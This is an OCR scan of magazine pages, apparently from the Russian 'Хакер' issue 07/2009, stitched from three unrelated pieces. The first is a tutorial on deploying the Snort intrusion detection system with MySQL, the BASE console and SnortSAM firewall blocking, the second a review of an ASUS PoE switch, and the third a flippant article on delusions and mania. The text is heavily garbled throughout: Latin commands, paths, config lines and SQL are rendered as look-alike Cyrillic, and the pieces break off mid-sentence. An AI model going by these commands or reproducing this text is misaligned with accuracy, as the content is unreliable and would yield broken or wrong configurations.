с д і / Боѵт 1 о аб / с ошш_г и 1 е з / С оішіип і бу - Ки 1 е з - 
СтКЕЫТ . баг . дг 

; Перечень файлов , которые требуется обновить 
рабЪ. = /Ьіп: /изг/Ьіп: /изг/ІосаІ/Ьіп 
ирбабе_бі1ез = \ . ги1ез$ I \ . сопбід$ | \ . сопб$ | \ . 

бхб$ I \ .шар$ 

; Список файлов , не подлежащих обновлению 
зкірбііе Іосаі. гиіез 
зкірбііе беіебеб. гиіез 
зкірбііе зпогб.сопб 
зкірбііе зіб-Ыоск.тар 

Оіпктазііег позволяет включать, отключать и изменять как от- 
дельные правила, так и правила, записанные в определенных 
(или всех) файлах. Каждое правило Зпоіт имеет свой уникаль- 
ный номер 5ГО (ЗпогИ ГО), который и использует Оіпктазііег. 
К примеру, чтобы после обновления отключить правило с 
5ГО 12345, дописываем в оіпктазііег. сопі строку: «бізаЫезіб 
12345». Есть и обратная операция: «епаЫезісІ». Для автома- 
тической замены строк в правилах используется директива 
«тосіііузісі», в качестве одного из параметров принимающая 
5ГО или имя файла. Например, заменяем в правиле 5ГО 1111 и 
для всех ехріоібгиіез действие аіегі; на сігор : 

тобібузіб ехріоіб . гиіез , 1111 " А а1егб" I "бгор" 

После того, как все настройки выполнены, запускаем команду 
на установку правил : 

# /изг/ІосаІ/Ьіп/оіпкшазбег -о /изг/іосаі/ебс/ 
зпогб /гиіез/ 

Эту задачу лучше автоматизировать с помощью сгоп: 

# сгопбаЬ -е 

30 2 * * * /изг/ Іосаі /Ьіп/оіпктазбег -о /изг/іосаі/ебс/ 
зпогб /гиіез/ -Ь /изг/ Іосаі /ебс/ зпогб /Ьаскир 2>&1 

Теперь в 2:30 ночи Оіпктазііег самостоятельно будет обнов- 
лять правила. Архив достаточно большой по размеру (90 Мб), 
и, если ЗпоП; установлен на нескольких системах, можно ска- 
чать его на одном компьютере и скопировать в локальный ка- 
талог, с которого и произвести обновление: 

# оіпкшазбег -и бііе: ///бшр/гиіез . баг . дг -о /изг/ 



Іосаі /ебс /зпогб /гиіез/ 

Когда все готово, запусти 5погб Для работы в режиме снифера 
главный бинарик следует стартовать с флагом -ѵ*. При этом на 
экран выводятся заголовки пакетов: 

# зпогб -ѵб 

Если в системе один интерфейс, то программа сама разбе- 
рется, с чем ей работать. В противном случае его требуется 
указать через ключ і': 

# зпогб -ѵб -і ІеО 

Теперь пробуем запустить ищейку в режиме МЭ5: 

# зпогб -с /изг/іосаі/ебс/зпогб/зпогб . сопб 
Іпібіаіі^іпд гиіе сЬаіпз . . . 

2163 Зпогб гиіез геаб 
2163 бебесбіоп гиіез 
-*> Зпогб ! <*- 

Ѵегзіоп 2 . 8 . 2 . 2 (Виііб 18) РгееВЗБ 

Запустив команду «баіі -1 /ѵаг/1о§/тезза§ез» на другом терми- 
нале, наблюдаем за процессом его запуска: 

зпогб [23312] : Іпібіаіігіпд баешоп тобе 
кегпеі: ІеО: рготізсиоиз тобе епаЫеб 
зпогб [23313 ] : Зпогб іпібіаіігабіоп сотріебеб 

зиссеззбиііу (ріб=23313) 

Если вылезли ошибки, следует с ними разобраться. Например, 
часто встречается такое сообщение: 

зпогб [23313] : N 06 бзіпд РСАР_РКАМЕЗ 

Переменная РСАР_ЕКАМЕ5 определяет размер буфера (в пре- 
делах 0 — 32768, значение «тах» эквивалентно максимально- 
му 32768), используемого для захваченных фрэймов. Чтобы 
победить проблему, достаточно выполнить команду: 

# зебепѵ РС АР_РКАМЕ 3 шах 

И прописываем эту строку в /еПс/сзЬ.сзЬгс. Напомню, что для / 
Ъіп/ЪазЬ вместо зеііепѵ используется ехрогіі и /епс/ргоШе : 

# ехрогб РСАР_РКАМЕЗ= "шах" 
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ПЕРЕД УСТАНОВКОЙ ВА5Е ТРЕБУЕТСЯ ВЫПОЛНИТЬ 
РЯД РЕКОМЕНДАЦИЙ 



Прописываем старт Зпогі в /еіс/гс.сопГ и запускаем: 




15 Ёс АпаІузЁэ апсі Зесигііу Епдіпе (ВАЗЕ) ЗеГир Ргодгат 




ЗАПОЛНЯЕМ ПАРАМЕТРЫ ДОСТУПА К МѴ5СК 



# есію 1 зпогк_епаЫе="УЕЗ" 1 » /екс/гс . сопк 

# /изг/іосаі/екс/гс . сі/зпогк зкагк 

ПОДКЛЮЧАЕМ ЗАПИСЬ БЫОКТ В МѴ50Б Теперь, когда Зпогі нормально 
работает, нужно настроить вывод собранной информации в базу данных. В 
качестве СУБД задействуем самую популярную платформу с открытым ко- 
дом, на которой современные разработчики строят сетевые сервисы. При 
сборке ЗпоіТ с параметром «-ШЛТН_МУ5(2Ь> параллельно будет установ- 
лен и клиент МуЗОБ. Смотрим его версию: 

# шузді 

шузді Ѵег 14.12 БізкгіЬ 5.0.75, ког рогкЫсі-кгееЪзсП . 1 
(І386) изіпд 5.2 



Наполняем базу при помощи шаблона: 

# шузді -и зпогк -рзпогкраззѵтогсі зпогк < /изг/іосаі/зйаге/ 
ехашріез/ зпогк /сгеаке_шузд1 

Теперь подключаем вывод Зпогі к МуЗОБ, добавив в зпогі.сопГ строку: 

# ее /изг/ІосаІ/еІс/зпогі/зпогБсоп^ 

оикриксіакаЪазе :1од, шузді ,изег=зпогкраззѵ\гогсі=зпогкраззѵтогс1 
с!Ьпате=зпогк Ъэзк=1оса1Ъ.озк 

Перезапускаем Зпогі: 



Из вывода следует, что используется версия 5.0, поэтому из нескольких ва- 
риантов сервера надо выбрать сервер МуЗОБ с таким же номером. Иначе 
сборка закончится неудачей. 

Установка Му 5 ОБ стандартна: 

# ссі /изг/рогкз/сіакаЪазез/тузд150-зегѵег 

# таке іпзкаіі сіеап 

# /изг/1оса1/Ъіп/тузд1_іпзка11_(іЪ 

# ср /изг/ІосаІ/зЬаге/туздІ/ту-тесІіит. спк /екс/ту.спк 

Запускаем: 

# есію ' шузд1_епаЫе="УЕЗ" ' » /екс/гс . сопк 

# /изг/іосаі/екс/гс . сі/шузді-зегѵег зкагк 

Проверяем работу: 

# зоскзкак -1 

шузді туздісі 42 648 10 кср4 *:3306 *:* 
тузді туздісі 42 648 12 зкгеат /ктр/тузді . зоск 



# /изг/іосаі/екс/гс . сі/зпогк гезкагк 

Теперь, когда Зпогі производит анализ трафика и записывает результат в 
базу МуЗОБ, самое время установить систему анализа ВАЗЕ. 

СОБИРАЕМ БАБЕ За все время развития Зпогі было создано большое коли- 
чество программ для анализа собранной информации — от консольных, 
вроде 5погіАБо§, проверяющих записи 5уз1о§, до графических, представля- 
ющих информацию в более удобном для восприятия виде. Одним из таких 
проектов стал ВАЗЕ (Вазіс Апаіузіз апсі Зесигііу Епдіпе, Ъазе.зесигеісіеаз.пек) . 
основой которого послужил популярный некогда интерфейс АСЮ (Апаіузіз 
Сопзоіе Гог Іпігизіоп ОаіаЪазез) . Сам АСГО уже долго не развивался и в насто- 
ящеевремяисключениздеревапортов.ВАЗЕфактическиявляетсянабором 
РНР-скриптов, при помощи которых создается веб-страница. Поэтому для 
его работы потребуется веб-сервер с поддержкой РНР и несколько допол- 
нительных средств: аскЮВ, СБ, РЕАК и Іша§е_СгарБ. Все это нужно будет 
отметить по ходу установки: 

# ссі /изг/рогкз/зесигіку/Ьазе 

# шаке іпзкаіі сіеап 



Устанавливаем пароль админа МуЗОБ: 

# /изг/ІосаІ/Ьіп/шуздІасітіп -и гоок раззѵтогсі пеѵѵраззѵ^огсі 

Создаем новую базу данных зпогі и даем пользователю с таким же именем 
все права: 

# шузді -и гоок -р 

шузд1> СКЕАТЕ БАТАВАЗЕ зпогк; 

шузд1>СШШТ АЬЬ РКІѴІЬЕСЕЗ ОБ зпогк . * ТО ' зпогк ' @ ' ІосаІБозк ' 
ІВЕЬГТІРІЕВ ВУ ' зпогкраззтлгогсі ' ; 
шузд1> ЕШЗН РКІѴІЬЕСЕЗ; 
шузд1> диік; 



По окончании все скрипты будут помещены в каталог /изг/іосаі Дѵтѵ/ 
Базе. Задаем нужные права: 

# сЪоші -К тт: тт /изг/ІосаІ/члплм/Ъазе 

Теперь открываем браузер, переходим на страницу Ьіір : //ір-зпогі/Ьазе и 
начинаем процесс настройки. Вначале скрипт проверит возможность за- 
писи в каталог /изг/ІосаІ/ѵѵѵѵѵѵ/Ьазе, версию РНР и уровень журналирова- 
ния РНР. Если по всем пунктам получаем положительный результат, идем 
к первому шагу, где выбираем язык и указываем путь к абоБВ (во фре — / 
изг/ІосаІ/зЬаге/асіосіЬ) . Следующий этап — указываем параметры доступа 
к базе зпогі (ОаіаЪазе іуре = Му 5 ОБ, ОаіаЪазе паше = зпогі, ОаіаЬазе Нозі 
= ІосаШозі, ОаіаЪазе изегпаше = зпогі, ОаіаЬазе Раззддюгсі = зпогіраззѵѵогсі) . 



ХАКЕР 07 /127/ 09 



► 129 











>> 5ѴМ/АСК 








ОСНОВНОЕОКНО ВА5Е 




5РЧ 





1 4* уо» штп и («ом; 


1 е "» «'•“"«-•ЧГ" - ПИ*, яре**"* М 


«ЬмМ к к» 


|Ао *Ь« МЫ оу. 


ЬоОіооС 


1<~кь. копіей | ■ ;'400 1 


ИІ «ТМИ (о Ім» 


Мочояо гуо+аю: 1 і*ооо] И |<к») Я |тГС») В і >о« ) Я 

кп«и, Р *фо,о: аіі^_ащ«цэ 


*окв» гро+мк*: 




тому соішіш» оі .колюоОі 4о уои ттл Іо мо7 


1 [«> <4 |1шп| 3 


4 юоікич ком. мМск окопміИ ооі? 


|Гі9лі«оотоо4ж> 0 
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ВА5Е УМЕЕТ СОЗДАВАТЬ НАГЛЯДНЫЕ ГРАФИКИ 



Далее, если требуется аутентификация, указываем логин и пароль, или, от- 
метив «ЕІзе АіпЬепгісагіоп Зузгет», используем системные учетные записи. 
На последнем шаге, нажав «СгеаНе ВАЗЕ АС», создаем базу Теперь перехо- 
дим на Ьпр : //ір-зпогіі/Ъазе и, отбирая критерии, просматриваем инфор- 
мацию, полученную из записей ЗпогГ — список обнаруженных атак и их 
источников, системы, на которые они направлены, топ атак и т.д. Вообще 
говоря, интерфейс ВАЗЕ очень прост и локализован, поэтомув его освоении 
не должно возникнуть проблем. 

УСТАНАВЛИВАЕМ БЫОКТБАМ Контроль данных, конечно, полезен и 
позволяет оценить уровень угроз, но без автоматизации блокировки атак 
схема будет недостаточно полной и эффективной. Для остановки атак 
предлагаю использовать ЗпогііЗАМ (шту.зпогГзат.пеГ) . который может 
заблокировать ІР-адрес, перенастраивая правила ІР Еікег (ірі) , ірКѵ2, Раскег 
Еікег (рО, Ыпих ІРгаЫез/ЕВгаЫез, М3 І5А Зегѵег йгеѵѵаіі/ргаху, некоторых 
роутеров Сізсо и т.д. Причем один ЗпогііЗАМ может управлять настройками 
сразу несколькихфайрволов (мощная фича!) . Сам ЗпогііЗАМ состоит из двух 
компонентов: патч к Зпогі; (мы его уже установили, использовав '-ШѴІТН_ 
5ЖЖТ5АМ') и собственно управляющей программы. Устанавливаем: 

# сб /изг/рогкз/зесигіку/зпогкзат 

# таке іпзкаіі сіеап 

Параметр у ЗпогііЗАМ только один: 

ОРТІСЖ8= РРШ "ЕпаЫе ІРРШ ІаЫе сйескіпд ік ік зек бепу 
гиіез" оп 

По умолчанию он включен, и в большинстве случаев нет смысла его изме- 
нять. Копируем шаблон конфига: 

# ср /изг/іосаі/екс/зпогкзаш/зпогкзаш. сопк . затріе /изг/ 
Іосаі/екс/зпогкзат/зпогкзат. сопк 

Опций внутри зпогіізат.сопі немало. Многие из них обеспечивают подклю- 
чение и настройку файрволов с внешнихмашин. Конфигурируем: 

йее/изг/іосаі/еіс/зпогізат/зпогізат.согк 

; Пароль для доступа со всех внешних машин должен совпа- 
дать с указанным в зпогк . сопк . При помощи другого параметра 
«ассерк» можно указывать пароль для каждой системы 
бекаиіккеу зпогкзаш_кеу 

; Порт, на котором Зпогк ЗАМ будет слушать подключения (по 
умолчанию 898) . 
рогк 898 



; Внутренние машины нельзя блокировать 
бопкЫоск 192 .168.1. 0/24 

; Список корневых ББ8- серверов , идет в комплекте 
іпсіибе гоокзегѵегз . скд 
; Режим демона 
баетоп 

; Файл журнала и уровень протоколирования 
Іодкііе зпогкзаш.іод 
Іодіеѵеі 3 

; Для блокировки используем ІР Ріікег 
ірк 1е0 

И в зпогксопідобавляем такую строку: 

оикрик а1егк_кчлзат: 127 . 0 . 0 . 1/ зпогк зат_кеу 

Где 127.0.0.1 — адрес компьютера, на котором работает ЗпогііЗАМ, и через 
дробь — ключ доступа к нему. В каждое правило Зпогі;, при совпадении с ко- 
торым необходима блокировка, следует добавить параметр «'й/ѵзат: {кто}, 
{время};'». Например, чтобы источник блокировался на час, пишем так: 
«йл/зат: зге, 1 йоиг;». Для этих целей какраз и подходит Оіпктазнег. 

тобікузіб 12345 "\)$" I "кмзат: зге, ІОтіпикез;)" 

Перезапускаем Зпогі; и запускаем ЗпогііЗАМ: 

# /изг/іосаі/екс/гс . б/зпогк гезкагк 

# есЪо ' зпогк зат_епаЫе="УЕЗ" 1 » /екс/гс.сопк 

# /изг/іосаі/екс/гс . б/зпогкзат зкагк 

Дш проверки можно создать в Іосаі.гиіез два правила, где 192.168.1.1 — ад- 
рес системы с установленным Зпогі;: 

аіегк кер апу апу -> 192.168.1.1 11110 (шзд : " ТЕ8Т Іод 11110/ 
кер" ; зіб: 1111110; ) 

аіегк кер апу апу -> 192.168.1.1 11111 (тзд:"ТЕЗТ Ыоск 
ІІІІІ/кср"; зіб: 1111111; кчлзат: зге [ іп] , 5тіп; ) 

Теперь при подключении телнетом к порту 11110 мы получим предупреж- 
дающее сообщение в журнале, а при подключении к порту 11111 чересчур 
активный узел будет блокирован на 5 минут. В итоге, мы получили полно- 
ценную систему защиты, которая будет днем и ночью защищать твои серве- 
ра. Эту схему можно развивать, используя несколько сенсоров Зпогі; и аген- 
тов ЗпогііЗАМ. Конечно, потребуется тонкая подгонка правил и настроек 
под конкретную обстановку, но это приятные хлопоты :) . ИНИ 
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» 5ѴІЧ/АСК 



>> ЗѴЫ/АСК 



ИГОРЬ ФЕДЮКИН 



Коммутатор 
А51І5 6Х2008ЕХ 



ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ: 

Тип: УПРАВЛЯЕМЫЙ КОММУТАТОРС ПОДДЕРЖКОЙ РОЕ 

Интерфейсы: 8X10/100 РА5ТЕТНЕКМЕТ|^Ч5)ріХ6ІСАВІТЕЕТНЕКМЕт>45),іХ 
6І6АВІТ ЕТНЕРЫЕТ (БРР) 

Функциональные возможности: ѴІ.АІМ, РОЕ, РАОШБ-АУТЕНТИФИКАЦИЯ, 

ЗЕРКАЛИРОВАНИЕ ПОРТОВ 

Управление: ѴѴЕВ-ОШ, СІ_І/ТЕІ_МЕТ,5ММР Ѵ.і/Ѵ.2 

Габариты, мм: 330 X 44 X 220 10000 руб. 




Мало кто не знает марку А5И5 — 
бренд зарекомендовал себя как 
производитель качественных 
компьютерных комплектующих 
самого различного характера. В 
последние годы компания весьма 
активно продвигает сетевое 
направление. Надо сказать, что в 
секторе беспроводного оборудо- 
вания для домашних пользовате- 
лей А5 115 добился значительных 
успехов. Однако в линейке ком- 
пании есть и решения для малого 
бизнеса — посмотрим, какобстоят 
дела с50Н0-коммутаторами. 

Кнам натестпопал управляемый 
коммутатор А5 115 ОХ2008ЕХ. Он 
снабжен 8-ю портами Еазі ВЬегпеГ 



портом ОідаЬИ: ЙЬегпеІ: и слотом 
5РРдля подключения оптичес- 
кого интерфейса. Одной из его 
ключевых особенностей является 
поддержка технологии РоЕ(Роѵѵег 
оѵег ЕіЬегпеі]. Она функционирует 
на всех 8-ми портах Разі ЕФегпеЕ 
Это позволяет использовать 
коммутатордля подключения 
I Р-видеокамер, ѴѴі-Еі точек доступа 
и другого оборудования, которое 
иногда приходится размещатьтам, 
куда не подведено электропита- 
ние. Технология РоЕ в этом случае 
придется как нельзя кстати. 
Коммутатор управляется с помо- 
щью командной строки (через 
Теіпеі или консольный кабель), 



атакже с использованием ѴѴеЬ- 
интерфейса. Последний, на наш 
взгляд, — наиболее оптимальное 
и наглядное средство настройки. 
Функциональность свитча до- 
статочно стандартна для своего 
класса. Имеется возможность 
объединения нескольких портов 
(ЦіпкАддгедаГюп), зеркалирования 
трафика (Міггогіпд), организации 
ѴЕАІЧ, приоритезации трафика 
с помощью Со5. Из функций 
безопасности есть поддержка 
аутентификации подключаемых 
пользователей на РА0Ш5-сервере 
и предотвращение йоосГинга на 
портах. Также возможно модифици- 
ровать та блицу ком мутации, зада в 



статическое соответствие МАС-ад- 
ресов определенным портам. 
Интересно меню статистики. 

Здесь отображается загрузка пор- 
тов, количество ошибок, возник- 
ших на них, а главное — рисуются 
очень красивые графики. 

Подводя итог, можно сказать, что 
А51І50Х2008ЕХ станет интересным 
решением для организации сети 
в небольшом офисе или загород- 
ном коттедже. В особенности это 
касается случаев, когда необходимо 
передавать питание через ЕіЬегпеІ- 
кабель. Что касается ценового фак- 
тора, то и тут А51І5 выглядит весьма 
уверенно по сравнению с похожими 
моделями конкурентов. т 
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РАСЩЕПЛЕНИЕ СОЗНАНИЯ В ОКЕАНЕ БЕЗУМИЯ 



ДОБРО ПОЖАЛОВАТЬ В ПАЛАТУ №6 



В ЭТОМ МЕСЯЦЕ РЕДАКТОР РУБРИКИ ПОСТАВИЛ ПЕРЕДО МНОЙ ВЕСЬМА НЕОБЫЧНУЮ 
ЗАДАЧУ — ПРОГУЛЯТЬСЯ ВМЕСТЕ С ЧИТАТЕЛЕМ ПО ЛАБИРИНТАМ НЕЗДОРОВЫХ ЧЕЛО- 
ВЕЧЕСКИХ ДУШ И РАССКАЗАТЬ ПРО ВСЯКИЕХИТРЫЕ ПСИХИЧЕСКИЕ ЗАБОЛЕВАНИЯ И 
РАССТРОЙСТВА, К КОТОРЫМ В ИТОГЕ МОЖЕТ ПРИВЕСТИ ЗЛОУПОТРЕБЛЕНИЕ ПСИХОАК- 
ТИВНЫМИ ВЕЩЕСТВАМИ. 



Дело сложное, поэтому начнем 
мы. какобычно — стеории. 

Атеория гласит, что сначала нам 
придется обратиться к азбуке, 
часть которой мы, кстати, уже рас- 
смотрели, проникшись нарушени- 
ями восприятия (галлюцинация- 
ми] в рамках предыдущего Рзусбо. 
Но ведь наше сознание состоит 
не из одного только восприятия. А 
какже мышление, чувства, воля, 
настроение? Вотс расстройствами 
этих частей наших стобой душ мы 
сейчас и постараемся позна- 
комиться... конечно, насколько 
хватит журнальной статьи, ведь 
в идеале на эти темы пишутся 
толстые (и не всегда с картинками] 
книги. 

Традиционно я отобрал для тебя 
только самые популярные в на- 
роде заболевания, про которые 
в этом же самом народе бродит 
самое большое количество мифов 
и заблуждений. Разобраться с 
ними будет довольно просто, по- 
скольку % конкретные заболевания 
(например, шизофрения], какиз 
кубиков «Лего» складываются 
из элементарных нарушений — 
бреда, галлюцинаций, депрессии 
и мании, апатии и паранойи... 

СУДАРЬ, 

ДА ВЫ БРЕДИТЕ! 

Бред — одно из самых доставляю- 
щих психических расстройств, и по 
силе воздействия на умы граждан 
его можно сравнить разве что с 
галлюцинациями. Обдолбился 
веществ? Бредишь! Заболел с 
высокой температурой и несешь 
чушь? Опять-таки, бредишь! 
Подвергаешь критике чужие 



идеалы, высмеиваешь чужую точку 
зрения? Бред несешь! Попро- 
буем продраться через тернии 
обывательских заблуждений и 
рассмотрим заумное определение: 
«бред — ложное умозаключение, 
возникающее на фоне болезни 
и не поддающееся логической 
коррекции». Такие дела, — опре- 
деление суровое, но оченьточное. 
Если твой друг считает, что кро- 
вожадные духи из нижних планов 
мироздания следятза ним, читая 
электронную переписку (кагк ва- 
риант, что в него влюблены сразу 
Арнольд Шварценеггер и Сильвия 
Саинт, или что он самый богатый 
человек в галактике, построив- 
ший мост от Земли до Юпитера, 
и пр.], и никакими разговорами и 
убеждениями направить в нужное 
русло его не получается, — похоже 
на бредятину. 

Однако, как видишь, не та кие уж и 
четкие критерии — какого-нибудь 
Галилея вполне можно было бы 
упрятать в дурдом за стойкое убеж- 
дение в подозрительной идее, что 
Земля — круглая и вращается во- 
круг Солнца, хотя даже неумному 
человеку ясно, что с круглой Земли 
мы бы все просто попадали. Ауж 
насчеттого, что и вокруг чего вра- 
щается — вообще «ноу комментс». 
Чаще надо выходить на улицу из 
вашихакадемиев и на небеса 
смотреть. 

• Бред ущерба и бред воздей- 
ствия. Одна из самых популярных 
разновидностей, при которой 
доминирующей идеей в червивое 
уме подопытного оказывается 
мысль о том, что ему кто-то или 
что-то вредит. Диапазон широк — 



отявно нереальных идей, вроде 
космических пришельцев, которые 
с помощью гиперволновых пере- 
датчиков портят иммунную систему 
душевнобольного, до моделиро- 
вания вполне реальных ситуаций, 
вроде подозрения соседей втом, 
что они подмешиваютнашему 
другу мышьяк и битое стекло в 
пищу, лелея надежду присвоить 
его квартиру. 

Подобные (да и вообще, все бре- 
довые] идеи занимают в сознании 
психованного почетное место, 
определяя его поведение и стиль 
жизни. Человекстановится подо- 
зрительным, замкнутым, постоян- 
но совершает какие-то защитные 
действия: прячет кошельки и сум- 
ки, запирает шкафчики, пытается 
стащить параболическую антенну 
соседей, одевает шапочки из 
фольги (да-да, этот былинный слу- 
чай относится как раз к бредовым 
идеям] или затыкаетзамочные 
скважины мокрымитряпками с 
целью защититься от всяческих от- 
равляющих веществ, оттуда якобы 
проистекающих. 

Кстати, не путай активные за- 
щитные действия у человека, 
страдающего бредом, с таковыми у 
человека с навязчивостями! «На- 
вязчивый» невротик прекрасно 
понимает, что его «действия» 

— полная фигня, но не делать он 
их не может под угрозой после- 
дующей тревоги и психологиче- 
ского дискомфорта («не сделал 

— что-то произойдет, что-то не 
произойдет»]. Да и действия в 
этом случае будут не активно- 
оборонительными супротив кон- 
кретного «воздействия», а чаще — 



хитро-ритуальными (перелистнуть 
две страницы книги, прочитать 
буквы на остановке левым глазом] 
ит.п. 

Довольно часто бред ущерба 
проявляется у наших старень- 
ких родственников; с этим ты 
мог сталкиваться и сам — «до- 
машние у меня крадут, только и 
думают, что бы такого стащить 
из серебряной посуды, врачи 
травят, а эти ваши современ- 
ные аппараты — вредные лучи 
излучают». Опять же, здесь все 
более чем сложно. Как отличить 
бред отобычной старческой по- 
дозрительности, помноженной 
на снижение памяти (были ли 
накопления, не потратила ли она 
их еще при Андропове, столько 
ли предметов было в столовом 
сервизе?], и других схожих со- 
стояний, вроде обычного негати- 
визма, свойственного преклон- 
ному возрасту? Научный факт: 
с возрастом часто заостряются 
веете отрицательные стороны 
характера, которые имели место в 
молодости. Так, легкая прижими- 
стость переходит в хардкорную 
жадность, а критический взгляд 
на вещи — в матерую подозри- 
тельность. Вывод прост — не спе- 
ши расклеивать на мягкие места 
своих родственников и знакомых 
клейкие листочки с диагнозами. 
Часто все оказывается не так 
просто, как выглядит, и даже пси- 
хиатрам бывает нелегко в этом 
разобраться. И таки да, соседи 
и родственники действительно 
могут вредить, а компетентные 
органы — за тобой следить с). Как 
говаривал ц-ц — «если у вас нет 
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БРЕД ПРЕСЛЕДОВАНИЯ. ТО, ЧТО В НАРОДЕ 
НАЗЫВАЮТ «МАНИЯ ПРЕСЛЕДОВАНИЯ». 
НИКАКОЙ МАНИЕЙ В НАУЧНОМ СМЫСЛЕ 
ЗДЕСЬ И НЕ ПАХНЕТ, А ЕСТЬ — САМЫЙ НА- 
СТОЯЩИЙ БРЕД, ТО ЕСТЬ КРАЙНЯЯ УБЕЖ- 
ДЕННОСТЬ В ТОМ, ЧТО НАШЕГО ПОДОПЫТ- 
НОГО КТО-ТО ПРЕСЛЕДУЕТ. 




паранойи, это не значит, что за 
вами не следят». Паранойе в этой 
статье посвящен целый раздел, 
а пока давай продолжим наше 
ознакомление с различными 
видами бредятины. 

• Бред преследования. То, что 

в народе называют«мания пре- 
следования». Никакой манией в 
научном смысле здесь и не пахнет, 
а есть — самый настоящий бред, то 
есть крайняя Убежденность в том, 
что нашего подопытного кто-то 
преследует. Разумеется, преследу- 
ет не с целью одарить наследством 
или вручить орден почетного 
легиона, а с сугубо отрицательной 
целью (например, убийство]. Часто 
такой бред имеет место у больных 
шизофренией. Ведутони себя со- 
ответственно; конечно же — никак 
не переубеждаются в обратном, а 
ежели ты путем ведения душе- 
спасительных бесед попробуешь 
поспорить — поимеешь реаль- 
ный шанс стать причисленным к 
группировке преследователей из 
МОССАДа и получить между глаз 
табуреткой. 

• Ипохондрический бред. Пом- 
нишь известный фильм «Формула 
любви», тот момент, где продвину- 
тый крестьянин ставитдворянско- 
му отпрыску диагноз «и похонд- 
рия»?Таквот, ипохондрический 
бред — это дубовая уверенность в 
наличии у себя какого-то, нередко 
— ужасно тяжелого, заболевания. 

И я тебе скажу, что это очень же- 
стокий бред. Какуже отмечалось 

в прошлой статье, современные 
психиатры стали слабы духом и 
телом, а потому — подобные лич- 
ности по большей части концен- 
трируются у нас, врачей, занимаю- 
щихся «телесными» болезнями 
(понятное дело, психическое 
расстройство они у себя отрицают 
и к психиатру не пойдут). 

Они требуют обследований, 



направлений в вышестоящие 
медицинскиеучреждения, новых 
анализов и консультаций. А 
поскольку особенности нашего 
государства тебе хорошо извест- 
ны, результат додумай сам — если 
у человека много времени на 
промывание мозгов и написание 
жалоб с прошениями, всех этих 
направлений и анализов он таки 
добьется. В ущерб по-настоящему 
больным людям. Да и диагнозом 
каким-то себя в итоге обогатит. 
Хотя и не факт, что таким, каким 
ему бы хотелось :). 

• Бред величия и высокого про- 
исхождения. Встречайте: Рыцарь 
в платиновых доспехах, Король- 
Солнце, Властелин галактики. 

Или проще: генералиссимус 
Российской Федерации, по- 
бедившийтуроки построивший 
Саяно-Шушенскую ГЭС без 
помощи кайла и лопаты. Необо- 
снованные и неподдающиеся 
переубеждению идейки собствен- 
ного величия или высокого про- 
исхождения по-настоящемужгут: 
ведь источающего их персонажа 
невозможно смутить. Его не бес- 
покоит собственный затрапезный 
вид, или что он живет в ночлежном 
доме, питается халявным соци- 
альным супом и докуриваетбычки 
у помойки. Не смущает, что звезда 
генералиссимуса сделана им из 
картона и, ктомуже, заляпана 
жиром. Имеетли все это значение, 
если он — сын русского императо- 
ра, которому в наследство был по- 
жалован железнодорожный вагон 
золотых рублей и мундир генерала 
в придачу? Бесспорно, не имеет! 

• Бред физического недо- 
статка и дисморфомания- 
дисморфофобия. На самом деле, 
заболевание ста ким хитрым 
названием — болезнь отдельная. 

О бреде тут говорятлишьтогда, 
когда человек окончательно 



расстается с крышей и критикой 
ксвоему состоянию. Надеюсь, 
профессионалы не обидятся на 
меня за такое классификационное 
допущение. Я сделал так для про- 
стоты понимания :). 

Само расстройство — просто, 
гениально и довольно распро- 
странено (до 2% популяции, по 
разным данным). Характеризу- 
ется тем, что человек становится 
очень, очень озабочен каким-то 
своим физическим недостатком: 
жирной и нездоровой кожей, 
большим носом, кривыми нога- 
ми, избыточным весом. Причем, 
в реальности этот «дефект» часто 
выражен настолько, что его никто 
из окружающих и не замечает. Не 
замечать-то, не замечает, а для 
больного это — целая трагедия! 
Он находится в постоянной 
тревоге, депрессии, смотрится в 
зеркало, читает литературку по 
теме, отказывается фотографи- 
роваться, мажется тональными 
кремами, покупает новейшую 
косметику, обращается за по- 
мощью к хирургам. 

Кстати, это расстройство нередко 
встречается и среди молодежи. 
Страдающие им личности до- 



вольно заметны и вполне могут 
находиться втвоем окружении. 
Будь наготове! Какувидишь 
персонажа, избыточно озабо- 
ченного мнимым косметическим 
дефектом — крути ему руки и 
тащи в сторону ближайшего дома 
сжелтыми окнами. Шучу. Просто 
будь в курсе, но не приставай к 
людям с глупостями, не дразни и 
не подшучивай над ними, даже 
по-доброму, если видишь, что че- 
ловек реально на этом зациклен 
(процент самоубийств у таких 
пациентов довольно высокий]. 

Да и вообще, ведьты можешь 
ошибаться, аучеловека — вовсе 
не психическое расстройство, а 
проявление перфекционизма. 

То есть, тревоги, депрессии, 
навязчивостей и пр. он не ис- 
пытывает, а просто хочет сделать 
себя лучше. Без фанатизма — 
фитнесс, диеты, бег, адекватная 
косметика. 

МАНЬЯКОМ 
МОЖЕШЬ ТЫ 
НЕ БЫТЬ, 

НО СЕКСУАЛЬНЫМ 
БЫТЬ ОБЯЗАН 

Конечно, народные понятия 
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ЭЛЕКТРОСУДОРОЖНАЯ ТЕРАПИЯ: 
НЕ ПОПАДАЙСЯ:) 



«мания величия» и «мания 
преследования» к научному 
толкованию термина «мания» 
не относятся, поэтому готовься к 
разрушению очередного мифа из 
мира СМИ. Итак, мания (маниа- 
кальный синдром] — это Разгон. 
Форсаж. Оверклокингорганизма. 
Ускорение мыслей, речи, душев- 
ный подъем. В маниакальном 
настроении (нетрудно догадаться, 
что оно может быть порождено 
веществами вроде кокаина, экс- 
тази или амфетаминов] человек 
испытывает бодрость, душевный 
подъем и двигательное возбужде- 
ние. Уходит сон, хочется думать, 
говорить, танцевать, двигаться и 
веселиться. Причем, обстоятель- 
ности нет и в помине — мысли до 
конца недодумываются, а скачут, 
сменяя одна другую. Тоже проис- 
ходити со словами — речь и вовсе 
за мыслями не поспевает, стано- 
вится разорванной и смазанной, 
нередко — с непонятной целью 
рифмованной (поэтому в случае 
выраженной мании окружающие 
не могут понять вообще ничего 
из того, что болезный хотел бы им 
сообщить]. 

Большинство маниакальных со- 
стояний, которые мы встречаем в 
жизни — а это обычно следствие 
передозировки допингообразных 
ноотропов (да-да, фенотропиль- 
чик] или психостимуляторов — 
относятся кгипомании (дословно 
— «ниже мании»] и характеризуют- 
ся общеприподнято-ускоренным 
мышлением, настроением, «дви- 
гательной сферой». Несмотря на 
кажущуюся бонусность состояния, 
министерство здравоохранения 
-г предостерегает тебя — от 
психостимуляторов организм идет 
«вразнос», истощается, наруша- 
ется сон, а со временем психо- 
навта подстерегаютзависимость, 
депрессия, тревога и последствия 
необдуманных решений (какя уже 
говорил, маниакальные мысли не- 



